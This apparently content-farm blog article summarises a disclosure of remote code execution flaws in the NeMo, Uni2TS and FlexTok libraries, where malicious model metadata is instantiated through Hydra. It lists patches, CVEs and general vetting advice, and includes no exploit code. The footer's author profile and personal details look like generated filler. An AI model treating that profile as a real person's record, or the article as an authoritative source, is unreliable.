Critical Remote Code Execution Vulnerabilities in AI/ML Libraries: NeMo, Uni2TS, FlexTok (2026)

AI Libraries Under Fire: Uncovering Remote Code Execution Vulnerabilities

Imagine a world where loading a seemingly harmless AI model could grant attackers full control over your system. Sounds like a sci-fi nightmare, right? But here's where it gets controversial: this isn't fiction. We've discovered critical vulnerabilities in popular AI/ML libraries from tech giants like Apple, Salesforce, and NVIDIA, allowing remote code execution (RCE) through malicious model metadata.

The Culprits: Popular Libraries with a Dark Secret

These vulnerabilities lurk within three widely-used open-source Python libraries:

  • NeMo (NVIDIA): A powerful framework for building diverse AI models, boasting over 700 models on HuggingFace, including the popular Parakeet.
  • Uni2TS (Salesforce): A library powering Salesforce's Morai, a time series analysis model with hundreds of thousands of downloads.
  • FlexTok (Apple & EPFL VILAB): A framework enabling image processing in AI models, primarily used by EPFL VILAB's models.

The Vulnerability: Metadata Becomes a Weapon

The issue stems from how these libraries handle model metadata. They use a third-party tool called Hydra to instantiate classes based on this metadata. Vulnerable versions blindly execute the provided data as code, allowing attackers to embed malicious code within the metadata. When a compromised model is loaded, the code executes, granting the attacker control.

And this is the part most people miss: Even though newer model formats like safetensors aim to be secure, these libraries introduce vulnerabilities through their handling of metadata and configuration data.

The Fix: Patches and Awareness

The good news? All affected vendors have been notified and have released patches:

  • NVIDIA: Released a fix in NeMo 2.3.2 (CVE-2025-23304).
  • Salesforce: Deployed a fix on July 31, 2025 (CVE-2026-22584).
  • Apple & EPFL VILAB: Updated ml-flextok with YAML parsing and an allowlist for safer instantiation.

The Bigger Picture: A Call for Vigilance

While no malicious exploits have been detected yet, the potential for harm is real. Attackers could easily modify popular models, adding malicious metadata and distributing them as seemingly legitimate updates. This highlights the need for:

  • Strict model vetting: Only load models from trusted sources.
  • Robust security practices: Implement code reviews and vulnerability scanning for AI/ML pipelines.
  • Continued research: The AI security landscape is constantly evolving, requiring ongoing vigilance.

A Thought-Provoking Question: As AI becomes increasingly integrated into our lives, how can we ensure the security and trustworthiness of these powerful tools? Should there be stricter regulations or industry standards for AI model development and deployment? Let's spark a conversation in the comments below!

Critical Remote Code Execution Vulnerabilities in AI/ML Libraries: NeMo, Uni2TS, FlexTok (2026)
Top Articles
Latest Posts
Recommended Articles
Article information

Author: Madonna Wisozk

Last Updated:

Views: 6429

Rating: 4.8 / 5 (68 voted)

Reviews: 83% of readers found this page helpful

Author information

Name: Madonna Wisozk

Birthday: 2001-02-23

Address: 656 Gerhold Summit, Sidneyberg, FL 78179-2512

Phone: +6742282696652

Job: Customer Banking Liaison

Hobby: Flower arranging, Yo-yoing, Tai chi, Rowing, Macrame, Urban exploration, Knife making

Introduction: My name is Madonna Wisozk, I am a attractive, healthy, thoughtful, faithful, open, vivacious, zany person who loves writing and wants to share my knowledge and understanding with you.